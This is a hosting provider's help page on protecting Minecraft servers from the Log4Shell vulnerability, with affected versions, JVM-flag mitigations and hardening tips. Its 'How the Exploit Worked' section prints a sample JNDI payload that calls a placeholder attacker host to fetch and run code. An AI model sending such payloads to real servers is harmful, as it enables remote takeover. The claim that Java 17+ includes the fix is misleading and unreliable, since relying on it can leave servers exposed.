# How to Protect Your Minecraft Server from the Log4j Vulnerability (/docs/minecraft/log4j-vulnerability)



The Log4j vulnerability (Log4Shell, CVE-2021-44228) was a critical security flaw discovered in December 2021 that affected Minecraft servers. It allowed attackers to execute arbitrary code by sending a specially crafted chat message.

Am I Affected? [#am-i-affected]

| Minecraft Version | Affected? | Fix                      |
| ----------------- | --------- | ------------------------ |
| 1.18.1+           | No        | Patched by Mojang        |
| 1.17–1.18         | Yes       | Update or apply JVM flag |
| 1.12–1.16.5       | Yes       | Apply JVM flag           |
| 1.7–1.11          | Partially | Apply JVM flag           |
| Below 1.7         | No        | Uses older Log4j         |

**If you're running Minecraft 1.18.1 or newer, you're already safe.** Mojang patched this in the official release.

Fixing the Vulnerability [#fixing-the-vulnerability]

<div className="fd-steps">
  <div className="fd-step">
    Update to the latest version (recommended) [#1-update-to-the-latest-version-recommended]

    The simplest fix is updating to Minecraft 1.18.1 or later. Update your server JAR through `Software Version` on the [XGamingServer panel](https://panel.xgamingserver.com).
  </div>

  <div className="fd-step">
    Apply the JVM flag (for older versions) [#2-apply-the-jvm-flag-for-older-versions]

    If you can't update, add this JVM flag in `Startup`:

    For Minecraft 1.12–1.18:

    ```
    -Dlog4j2.formatMsgNoLookups=true
    ```

    For Minecraft 1.7–1.11, you need a patched Log4j configuration file. Download the official fix from Mojang and add:

    ```
    -Dlog4j.configurationFile=log4j2_17-111.xml
    ```
  </div>

  <div className="fd-step">
    Update Paper/Spigot [#3-update-paperspigot]

    If you're running Paper or Spigot, update to the latest build for your Minecraft version. Both projects released patches shortly after the vulnerability was disclosed.
  </div>

  <div className="fd-step">
    Restart the server [#4-restart-the-server]

    Restart from `Console` for the fix to take effect.
  </div>
</div>

How the Exploit Worked [#how-the-exploit-worked]

An attacker could send a chat message like:

```
${jndi:ldap://attacker-server.com/exploit}
```

The Log4j library would process this string, connect to the attacker's server, download malicious code, and execute it — giving the attacker full control of the server machine.

Verifying the Fix [#verifying-the-fix]

After applying the fix:

1. Check your server's Java version — Java 17+ includes the Log4j fix
2. Verify the JVM flag is active in `Console` startup output
3. Test with a Log4j scanner (search "Log4Shell scanner" for safe testing tools)

Additional Security Measures [#additional-security-measures]

* Keep your server software updated
* Use a firewall to restrict outbound connections from the server
* Monitor server logs for suspicious `${jndi:` strings
* Use [server logs](/docs/minecraft/find-share-server-logs) to check for past exploitation attempts

> ⚠️ **Warning:** If your server was running an unpatched version during December 2021–early 2022 and was publicly accessible, it may have been compromised. Check for unfamiliar files, plugins, or scheduled tasks.

> 📝 **Note:** XGamingServer applied protective measures across all servers during the initial disclosure. If you're hosting with us, your server was protected. This guide is primarily for awareness and for anyone running custom server JARs.

See also: [Find Server Logs](/docs/minecraft/find-share-server-logs) | [Server Types](/docs/minecraft/server-types-explained)

If you need help, join our [Discord](https://discord.xgamingserver.com/).